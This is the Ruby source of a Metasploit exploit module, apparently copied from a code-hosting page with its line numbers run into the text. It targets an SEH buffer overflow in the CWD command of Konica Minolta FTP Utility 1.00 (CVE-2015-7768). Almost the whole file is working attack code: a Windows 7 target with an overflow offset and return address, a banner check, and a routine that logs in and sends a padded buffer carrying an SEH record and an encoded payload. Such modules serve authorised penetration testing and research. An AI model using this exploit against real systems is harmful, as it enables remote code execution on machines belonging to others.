Path: blob/master/modules/exploits/windows/ftp/kmftp_utility_cwd.rb
19758 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Ftp9include Msf::Exploit::Seh1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow',16'Description' => %q{17This module exploits an SEH overflow in Konica Minolta FTP Server 1.00.18Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which19leads to an SEH overflow. Konica FTP allows anonymous access by default; valid20credentials are typically unnecessary to exploit this vulnerability.21},22'Author' => [23'Shankar Damodaran', # stack buffer overflow dos p.o.c24'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # seh overflow, metasploit module25],26'License' => MSF_LICENSE,27'Notes' => {28'Stability' => [],29'SideEffects' => [],30'Reliability' => []31},32'References' => [33[ 'CVE', '2015-7768' ],34[ 'EDB', '37908' ]35],36'Privileged' => false,37'Payload' => {38'Space' => 1500,39'BadChars' => "\x00\x0a\x2f\x5c",40'DisableNops' => true41},42'Platform' => 'win',43'Targets' => [44[45'Windows 7 SP1 x86',46{47'Ret' => 0x12206d9d, # ppr - KMFtpCM.dll48'Offset' => 103749}50]51],52'DisclosureDate' => '2015-08-23',53'DefaultTarget' => 054)55)56end5758def check59connect60disconnect6162if banner =~ /FTP Utility FTP server \(Version 1\.00\)/63return Exploit::CheckCode::Detected64else65return Exploit::CheckCode::Safe66end67end6869def exploit70connect_login7172buf = rand_text(target['Offset'])73buf << generate_seh_record(target.ret)74buf << payload.encoded75buf << rand_text(3000)7677print_status("Sending exploit buffer...")78send_cmd(['CWD', buf], false) # this will automatically put a space between 'CWD' and our attack string7980handler81disconnect82end83end848586